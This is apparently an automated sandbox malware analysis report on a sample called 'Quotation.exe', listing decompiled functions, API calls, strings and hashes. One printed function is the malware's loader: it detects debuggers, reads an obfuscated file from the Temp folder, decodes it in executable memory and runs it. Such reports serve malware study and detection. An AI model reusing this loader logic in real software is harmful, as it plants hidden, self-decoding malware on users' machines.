                                                0x00405438
                                                0x0040544c
                                                0x0040543a
                                                0x0040543d
                                                0x00405445
                                                0x00405445
                                                0x00405438
                                                0x0040540a
                                                0x00405410
                                                0x00405412
                                                0x00405418
                                                0x00405418
                                                0x00405412
                                                0x00000000
                                                0x00405408
                                                0x004053e8
                                                0x004053eb
                                                0x004053ed
                                                0x00000000
                                                0x00000000
                                                0x004053ef
                                                0x004053f1
                                                0x00000000
                                                0x00000000
                                                0x004053f3
                                                0x004053f7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040545c
                                                0x00405466
                                                0x0040546c
                                                0x0040546c
                                                0x00405477
                                                0x00000000
                                                0x0040535d
                                                0x0040535d
                                                0x0040535f
                                                0x00405487
                                                0x0040548a
                                                0x0040548d
                                                0x004054e5
                                                0x004054e5
                                                0x004054e5
                                                0x0040548f
                                                0x00405492
                                                0x0040549d
                                                0x004054a2
                                                0x004054a4
                                                0x00000000
                                                0x00000000
                                                0x004054a7
                                                0x004054b2
                                                0x004054b9
                                                0x004054bf
                                                0x004054c1
                                                0x00000000
                                                0x004054dd
                                                0x004054c3
                                                0x004054c7
                                                0x00000000
                                                0x00000000
                                                0x004054cc
                                                0x00000000
                                                0x004054d3
                                                0x00405494
                                                0x00405494
                                                0x00000000
                                                0x00405494
                                                0x00405365
                                                0x00405369
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405369

                                                APIs
                                                • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\Quotation.exe" ,00000000), ref: 0040533B
                                                • lstrcatA.KERNEL32(0042B8A8,\*.*,0042B8A8,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\Quotation.exe" ,00000000), ref: 00405385
                                                • lstrcatA.KERNEL32(?,00409010,?,0042B8A8,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\Quotation.exe" ,00000000), ref: 00405398
                                                • lstrlenA.KERNEL32(?,?,00409010,?,0042B8A8,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\Quotation.exe" ,00000000), ref: 0040539E
                                                • FindFirstFileA.KERNEL32(0042B8A8,?,?,?,00409010,?,0042B8A8,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\Quotation.exe" ,00000000), ref: 004053AF
                                                • FindNextFileA.KERNEL32(?,?,000000F2,?), ref: 00405466
                                                • FindClose.KERNEL32(?), ref: 00405477
                                                Strings
                                                • "C:\Users\user\Desktop\Quotation.exe" , xrefs: 00405327
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405351
                                                • \*.*, xrefs: 0040537F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: "C:\Users\user\Desktop\Quotation.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                • API String ID: 2035342205-3153790480
                                                • Opcode ID: 3522ceb3759a82111fcba68967208c99b7d02cfbf248ea4468f4fadd88b01e5f
                                                • Instruction ID: 3fe59752bbf574e46fae068060fc046f50c982b120df211f1784a4fc8f97d981
                                                • Opcode Fuzzy Hash: 3522ceb3759a82111fcba68967208c99b7d02cfbf248ea4468f4fadd88b01e5f
                                                • Instruction Fuzzy Hash: E651CE30404A54BACB216B618C85BFF3B78DF42755F14817BF941B61D2C77C4982DE6A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 73CA1000, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 84filememorystringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E73CA1000() {
				long _v8;
				short _v528;
				long _t12;
				void* _t16;
				signed char _t21;
				void* _t35;
				long _t38;

				_v8 = 0;
				if(IsDebuggerPresent() != 0) {
					DebugBreak();
				}
				_t12 = GetTempPathW(0x103,  &_v528);
				if(_t12 != 0) {
					lstrcatW( &_v528, L"\\tqph8ojuftde3");
					_t16 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					_t35 = _t16;
					if(_t35 == 0xffffffff) {
						L12:
						return _t16;
					}
					_t16 = GetFileSize(_t35, 0);
					_t38 = _t16;
					if(_t38 == 0xffffffff) {
						L11:
						goto L12;
					}
					_t16 = VirtualAlloc(0, _t38, 0x3000, 0x40); // executed
					 *0x73ca3000 = _t16;
					if(_t16 == 0) {
						goto L11;
					}
					_t16 = ReadFile(_t35, _t16, _t38,  &_v8, 0); // executed
					if(_t16 == 0) {
						goto L11;
					}
					_t21 = 0;
					if(_v8 <= 0) {
						L10:
						_t16 =  *0x73ca3000(); // executed
						goto L11;
					}
					do {
						 *( *0x73ca3000 + _t21) = 0x00000081 - ( ~(( !( !( *( *0x73ca3000 + _t21)) + 0x15) - 0x0000006f ^ _t21) + _t21) ^ 0x00000007) ^ _t21;
						_t21 = _t21 + 1;
					} while (_t21 < _v8);
					goto L10;
				}
				return _t12;
			}










                                                0x73ca1009
                                                0x73ca1018
                                                0x73ca101a
                                                0x73ca101a
                                                0x73ca102c
                                                0x73ca1034
                                                0x73ca1047
                                                0x73ca1066
                                                0x73ca106c
                                                0x73ca1071
                                                0x73ca10f3
                                                0x00000000
                                                0x73ca10f3
                                                0x73ca107b
                                                0x73ca1081
                                                0x73ca1086
                                                0x73ca10f2
                                                0x00000000
                                                0x73ca10f2
                                                0x73ca1092
                                                0x73ca1098
                                                0x73ca109f
                                                0x00000000
                                                0x00000000
                                                0x73ca10aa
                                                0x73ca10b2
                                                0x00000000
                                                0x00000000
                                                0x73ca10b5
                                                0x73ca10ba
                                                0x73ca10eb
                                                0x73ca10eb
                                                0x00000000
                                                0x73ca10f1
                                                0x73ca10c0
                                                0x73ca10e2
                                                0x73ca10e5
                                                0x73ca10e6
                                                0x00000000
                                                0x73ca10c0
                                                0x73ca10f7

                                                APIs
                                                • IsDebuggerPresent.KERNEL32 ref: 73CA1010
                                                • DebugBreak.KERNEL32 ref: 73CA101A
                                                • GetTempPathW.KERNEL32(00000103,?), ref: 73CA102C
                                                • lstrcatW.KERNEL32(?,\tqph8ojuftde3), ref: 73CA1047
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 73CA1066
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 73CA107B
                                                • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 73CA1092
                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 73CA10AA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.242759619.0000000073CA1000.00000020.00020000.sdmp, Offset: 73CA0000, based on PE: true
                                                • Associated: 00000000.00000002.242754104.0000000073CA0000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.242763462.0000000073CA2000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.242769232.0000000073CA4000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: File$AllocBreakCreateDebugDebuggerPathPresentReadSizeTempVirtuallstrcat
                                                • String ID: \tqph8ojuftde3
                                                • API String ID: 4020703165-3612711331
                                                • Opcode ID: ee824c13c35d66843f9ae74946fb1d05c95f588ef43d8382cd0abd661d47ff22
                                                • Instruction ID: 9896799e7801d30c51bd4a612cff6096d1c809a897624c6fb4598445d4a98b5a
                                                • Opcode Fuzzy Hash: ee824c13c35d66843f9ae74946fb1d05c95f588ef43d8382cd0abd661d47ff22
                                                • Instruction Fuzzy Hash: D5216036500265AFE310EB76CD5DF9B7B7CE701710F208150EA5AEB0C0CB345905E720
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401FDC, Relevance: 9.1, APIs: 6, Instructions: 72libraryloaderCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E00401FDC(int __ebx) {
				struct HINSTANCE__* _t20;
				struct HINSTANCE__* _t27;
				int _t28;
				struct HINSTANCE__* _t33;
				CHAR* _t35;
				intOrPtr* _t36;
				void* _t37;

				_t28 = __ebx;
				 *(_t37 - 4) = 1;
				SetErrorMode(0x8001); // executed
				if( *0x42f4d0 < __ebx) {
					_push(0xffffffe7);
					goto L14;
				} else {
					_t35 = E00402A9A(0xfffffff0);
					 *(_t37 + 8) = E00402A9A(1);
					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
						L3:
						_t20 = LoadLibraryA(_t35); // executed
						_t33 = _t20;
						if(_t33 == _t28) {
							_push(0xfffffff6);
							L14:
							E00401428();
						} else {
							goto L4;
						}
					} else {
						_t27 = GetModuleHandleA(_t35); // executed
						_t33 = _t27;
						if(_t33 != __ebx) {
							L4:
							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
							if(_t36 == _t28) {
								E00404D7E(0xfffffff7,  *(_t37 + 8));
							} else {
								 *(_t37 - 4) = _t28;
								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x430000, 0x40b040, 0x409000); // executed
								} else {
									E00401428( *((intOrPtr*)(_t37 - 0x1c)));
									if( *_t36() != 0) {
										 *(_t37 - 4) = 1;
									}
								}
							}
							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
								FreeLibrary(_t33);
							}
						} else {
							goto L3;
						}
					}
				}
				SetErrorMode(_t28);
				 *0x42f4a8 =  *0x42f4a8 +  *(_t37 - 4);
				return 0;
			}










                                                0x00401fdc
                                                0x00401fe4
                                                0x00401fe7
                                                0x00401ff3
                                                0x00402093
                                                0x00000000
                                                0x00401ff9
                                                0x00402001
                                                0x0040200b
                                                0x0040200e
                                                0x0040201d
                                                0x0040201e
                                                0x00402024
                                                0x00402028
                                                0x0040208f
                                                0x00402095
                                                0x00402095
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402010
                                                0x00402011
                                                0x00402017
                                                0x0040201b
                                                0x0040202a
                                                0x00402034
                                                0x00402038
                                                0x0040207c
                                                0x0040203a
                                                0x0040203d
                                                0x00402040
                                                0x00402070
                                                0x00402042
                                                0x00402045
                                                0x0040204e
                                                0x00402050
                                                0x00402050
                                                0x0040204e
                                                0x00402040
                                                0x00402084
                                                0x00402087
                                                0x00402087
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040201b
                                                0x0040200e
                                                0x0040209b
                                                0x00402932
                                                0x0040293e

                                                APIs
                                                • SetErrorMode.KERNELBASE(00008001), ref: 00401FE7
                                                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402011
                                                  • Part of subcall function 00404D7E: lstrlenA.KERNEL32(0042A080,00000000,0041A058,7519EA30,?,?,?,?,?,?,?,?,?,00403018,00000000,?), ref: 00404DB7
                                                  • Part of subcall function 00404D7E: lstrlenA.KERNEL32(00403018,0042A080,00000000,0041A058,7519EA30,?,?,?,?,?,?,?,?,?,00403018,00000000), ref: 00404DC7
                                                  • Part of subcall function 00404D7E: lstrcatA.KERNEL32(0042A080,00403018,00403018,0042A080,00000000,0041A058,7519EA30), ref: 00404DDA
                                                  • Part of subcall function 00404D7E: SetWindowTextA.USER32(0042A080,0042A080), ref: 00404DEC
                                                  • Part of subcall function 00404D7E: SendMessageA.USER32 ref: 00404E12
                                                  • Part of subcall function 00404D7E: SendMessageA.USER32 ref: 00404E2C
                                                  • Part of subcall function 00404D7E: SendMessageA.USER32 ref: 00404E3A
                                                • LoadLibraryA.KERNELBASE(00000000,00000001,000000F0), ref: 0040201E
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0040202E
                                                • FreeLibrary.KERNEL32(00000000,000000F7,?), ref: 00402087
                                                • SetErrorMode.KERNEL32 ref: 0040209B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 1609199483-0
                                                • Opcode ID: 4abed337f43c9168ffad4b573985f780fbeb4aea72ba3c33bd1809f5dbb1ef61
                                                • Instruction ID: c5381c54e09c994885a3158ba55f540892437f2dc07422c62f15d33d11318b3a
                                                • Opcode Fuzzy Hash: 4abed337f43c9168ffad4b573985f780fbeb4aea72ba3c33bd1809f5dbb1ef61
                                                • Instruction Fuzzy Hash: 69210B31D04321EBCB216FA59E4CA5E7670AF54315B20023BF712B22E1D7BC4982DA9E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405CB0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405CB0(CHAR* _a4) {
				void* _t3;
				void* _t8;

				SetErrorMode(0x8001); // executed
				_t3 = FindFirstFileA(_a4, 0x42c8f0); // executed
				_t8 = _t3; // executed
				SetErrorMode(0); // executed
				if(_t8 == 0xffffffff) {
					return 0;
				}
				FindClose(_t8); // executed
				return 0x42c8f0;
			}





                                                0x00405cbe
                                                0x00405cca
                                                0x00405cd2
                                                0x00405cd4
                                                0x00405cd9
                                                0x00000000
                                                0x00405ce6
                                                0x00405cdc
                                                0x00000000

                                                APIs
                                                • SetErrorMode.KERNELBASE(00008001,00000000,0042BCA8,C:\Users\user\AppData\Local\Temp\,0040560B,0042BCA8,0042BCA8,00000000,0042BCA8,0042BCA8,?,?,00000000,00405331,?,"C:\Users\user\Desktop\Quotation.exe" ), ref: 00405CBE
                                                • FindFirstFileA.KERNELBASE(?,0042C8F0), ref: 00405CCA
                                                • SetErrorMode.KERNELBASE(00000000), ref: 00405CD4
                                                • FindClose.KERNELBASE(00000000), ref: 00405CDC
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CB0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ErrorFindMode$CloseFileFirst
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2885216544-823278215
                                                • Opcode ID: 4bcafefa4e130ec5ad77df29b00d99c8f1cd56117c23fcf05118be8afef71f8e
                                                • Instruction ID: 4661ff598cab52d61aefab85f16d743ffe836d29aedf95ad22b7aca8ae85483a
                                                • Opcode Fuzzy Hash: 4bcafefa4e130ec5ad77df29b00d99c8f1cd56117c23fcf05118be8afef71f8e
                                                • Instruction Fuzzy Hash: 27E0CD32B087605BD20017B46D88D0B365CEBD5721F104133F600F62D0C6B55C014BF9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403542, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 215stringregistrylibraryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 89%
                                                			E00403542() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t82;
				CHAR* _t84;
				CHAR* _t85;

				_t80 =  *0x42f428;
				_t20 = E00405CEE("KERNEL32.dll", "GetUserDefaultUILanguage");
				_t88 = _t20;
				if(_t20 == 0) {
					_t78 = 0x42a8a0;
					"1033" = 0x7830;
					E004058CF(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a8a0);
					__eflags =  *0x42a8a0;
					if(__eflags == 0) {
						E004058CF(0x80000003, ".DEFAULT\\Control Panel\\International", "Locale", 0x42a8a0);
					}
					lstrcatA("1033", _t78);
				} else {
					E00405939("1033",  *_t20() & 0x0000ffff);
				}
				E0040380E(_t75, _t88);
				_t84 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
				 *0x42f4a0 =  *0x42f430 & 0x00000020;
				if(E004055C8(_t88, _t84) != 0) {
					L16:
					if(E004055C8(_t96, _t84) == 0) {
						_push( *((intOrPtr*)(_t80 + 0x118)));
						_push(_t84);
						E004059FD(0, _t78, _t80);
					}
					_t28 = LoadImageA( *0x42f420, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42ec08 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E00401410(0) == 0) {
							_t30 = E0040380E(_t75, __eflags);
							__eflags =  *0x42f4c0;
							if( *0x42f4c0 != 0) {
								_t31 = E00404E50(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E00401410(1);
									goto L33;
								}
								__eflags =  *0x42ebec; // 0x0
								if(__eflags == 0) {
									E00401410(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a880, 5);
							_t85 = "RichEd20.dll";
							_t37 = LoadLibraryA(_t85);
							__eflags = _t37;
							if(_t37 == 0) {
								M004092B6 = 0x3233;
								LoadLibraryA(_t85);
							}
							_t82 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t82, 0x42ebc0);
							__eflags = _t38;
							if(_t38 == 0) {
								 *0x4092ac = 0;
								GetClassInfoA(0, _t82, 0x42ebc0);
								 *0x42ebe4 = _t82;
								 *0x4092ac = 0x32;
								RegisterClassA(0x42ebc0);
							}
							_t39 =  *0x42ec00; // 0x0
							_t42 = DialogBoxParamA( *0x42f420, _t39 + 0x00000069 & 0x0000ffff, 0, E004038DB, 0);
							E00401410(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x42f420;
						 *0x42ebd4 = _t28;
						_v20 = 0x624e5f;
						 *0x42ebc4 = E00401000;
						 *0x42ebd0 =  *0x42f420;
						 *0x42ebe4 =  &_v20;
						if(RegisterClassA(0x42ebc0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x42a880 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f420, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t78 = 0x42e3c0;
					E004058CF( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x42f458, 0x42e3c0);
					_t61 =  *0x42e3c0; // 0x59
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x42e3c1;
						 *((char*)(E00405513(0x42e3c1, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ".exe") != 0) {
						L15:
						E004059DB(_t84, E004054E8(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E0040552F(_t78);
							goto L15;
						}
						_t96 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}




























                                                0x00403548
                                                0x00403559
                                                0x00403560
                                                0x00403562
                                                0x00403576
                                                0x0040357b
                                                0x00403591
                                                0x00403596
                                                0x0040359c
                                                0x004035ae
                                                0x004035ae
                                                0x004035b9
                                                0x00403564
                                                0x0040356f
                                                0x0040356f
                                                0x004035be
                                                0x004035c8
                                                0x004035d1
                                                0x004035dd
                                                0x00403663
                                                0x0040366b
                                                0x0040366d
                                                0x00403673
                                                0x00403674
                                                0x00403674
                                                0x0040368a
                                                0x00403690
                                                0x0040369e
                                                0x0040372d
                                                0x00403735
                                                0x0040373f
                                                0x00403744
                                                0x0040374a
                                                0x004037dc
                                                0x004037e1
                                                0x004037e3
                                                0x004037ff
                                                0x00000000
                                                0x004037ff
                                                0x004037e5
                                                0x004037eb
                                                0x004037f3
                                                0x004037f3
                                                0x00000000
                                                0x004037eb
                                                0x00403758
                                                0x00403764
                                                0x0040376a
                                                0x0040376c
                                                0x0040376e
                                                0x00403771
                                                0x0040377a
                                                0x0040377a
                                                0x00403782
                                                0x0040378a
                                                0x0040378c
                                                0x0040378e
                                                0x00403793
                                                0x00403799
                                                0x0040379c
                                                0x004037a2
                                                0x004037a9
                                                0x004037a9
                                                0x004037af
                                                0x004037c8
                                                0x004037d2
                                                0x00000000
                                                0x004037d7
                                                0x00403737
                                                0x00403739
                                                0x00000000
                                                0x004036a4
                                                0x004036a4
                                                0x004036aa
                                                0x004036b4
                                                0x004036bc
                                                0x004036c6
                                                0x004036cc
                                                0x004036da
                                                0x00403804
                                                0x00403804
                                                0x00000000
                                                0x00403804
                                                0x004036e0
                                                0x004036e9
                                                0x00403728
                                                0x00000000
                                                0x00403728
                                                0x004035e3
                                                0x004035e3
                                                0x004035e8
                                                0x00000000
                                                0x00000000
                                                0x004035f2
                                                0x00403601
                                                0x00403606
                                                0x0040360d
                                                0x00000000
                                                0x00000000
                                                0x00403611
                                                0x00403613
                                                0x00403620
                                                0x00403620
                                                0x00403628
                                                0x0040362e
                                                0x00403656
                                                0x0040365e
                                                0x00000000
                                                0x00403640
                                                0x00403641
                                                0x0040364a
                                                0x00403650
                                                0x00403651
                                                0x00000000
                                                0x00403651
                                                0x0040364c
                                                0x0040364e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040364e
                                                0x0040362e

                                                APIs
                                                  • Part of subcall function 00405CEE: GetModuleHandleA.KERNEL32(000000F1,00405736,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054D8,?,00000000,000000F1,?), ref: 00405CF2
                                                  • Part of subcall function 00405CEE: LoadLibraryA.KERNEL32(000000F1,?,?,004054D8,?,00000000,000000F1,?), ref: 00405D00
                                                  • Part of subcall function 00405CEE: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405D0F
                                                • lstrcatA.KERNEL32(1033,0042A8A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8A0,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\Quotation.exe" ,00000000,00000000,C:\Users\user\AppData\Local\Temp\,00000020), ref: 004035B9
                                                • lstrlenA.KERNEL32(YVfgfgfgfgfg,?,?,?,YVfgfgfgfgfg,C:\Users\user\AppData\Local\Temp,1033,0042A8A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8A0,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\Quotation.exe" ,00000000), ref: 00403623
                                                • lstrcmpiA.KERNEL32(?,.exe,YVfgfgfgfgfg,?,?,?,YVfgfgfgfgfg,C:\Users\user\AppData\Local\Temp,1033,0042A8A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8A0,KERNEL32.dll,GetUserDefaultUILanguage), ref: 00403636
                                                • GetFileAttributesA.KERNEL32(YVfgfgfgfgfg), ref: 00403641
                                                • LoadImageA.USER32 ref: 0040368A
                                                • RegisterClassA.USER32 ref: 004036D1
                                                  • Part of subcall function 00405939: wsprintfA.USER32 ref: 00405946
                                                • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036E9
                                                • CreateWindowExA.USER32 ref: 00403722
                                                • ShowWindow.USER32(00000005,00000000), ref: 00403758
                                                • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040376A
                                                • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040377A
                                                • GetClassInfoA.USER32 ref: 0040378A
                                                • GetClassInfoA.USER32 ref: 00403799
                                                • RegisterClassA.USER32 ref: 004037A9
                                                • DialogBoxParamA.USER32 ref: 004037C8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: "C:\Users\user\Desktop\Quotation.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$KERNEL32.dll$Locale$RichEd20.dll$RichEdit20A$YVfgfgfgfgfg$_Nb
                                                • API String ID: 914957316-2909165264
                                                • Opcode ID: d176114afbd04041798e0cb44c6bd170754ede8e8114513eb1934af700cf44d0
                                                • Instruction ID: 60d3dd17ab41db2a81a331a2e75007f0283db07517ec3cfb703c1e7772151899
                                                • Opcode Fuzzy Hash: d176114afbd04041798e0cb44c6bd170754ede8e8114513eb1934af700cf44d0
                                                • Instruction Fuzzy Hash: C161D5B1604200BFD720BF669C45E273EACEB44759F80457FF941B22E2D778A9058A7E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402C37, Relevance: 35.2, APIs: 10, Strings: 10, Instructions: 195memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 81%
                                                			E00402C37(void* __eflags, signed int _a4) {
				struct HWND__* _v8;
				long _v12;
				long _v16;
				void* _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				long _t52;
				signed int _t56;
				void* _t62;
				intOrPtr* _t66;
				long _t67;
				signed int _t73;
				signed int _t78;
				signed int _t79;
				long _t84;
				intOrPtr _t89;
				void* _t91;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t97;
				signed int _t101;
				void* _t102;

				_v8 = 0;
				_t52 = GetTickCount();
				_v16 = 0;
				_v12 = 0;
				_t100 = "C:\\Users\\alfons\\Desktop";
				_t97 = _t52 + 0x3e8;
				GetModuleFileNameA( *0x42f420, "C:\\Users\\alfons\\Desktop", 0x400);
				_t91 = E004056AC(_t100, 0x80000000, 3);
				_v20 = _t91;
				 *0x409020 = _t91;
				if(_t91 == 0xffffffff) {
					return "Error launching installer";
				}
				E0040552F(_t100);
				_t56 = GetFileSize(_t91, 0);
				__eflags = _t56;
				 *0x428c58 = _t56;
				_t101 = _t56;
				if(_t56 <= 0) {
					L27:
					__eflags =  *0x42f42c;
					if( *0x42f42c == 0) {
						goto L33;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L31:
						_t102 = GlobalAlloc(0x40, _v28);
						E0040311B( *0x42f42c + 0x1c);
						_push(_v28);
						_push(_t102);
						_push(0);
						_push(0xffffffff);
						_t62 = E00402EBD();
						__eflags = _t62 - _v28;
						if(_t62 == _v28) {
							__eflags = _a4 & 0x00000002;
							 *0x42f428 = _t102;
							if((_a4 & 0x00000002) != 0) {
								 *_t102 =  *_t102 | 0x00000008;
								__eflags =  *_t102;
							}
							__eflags = _v48 & 0x00000001;
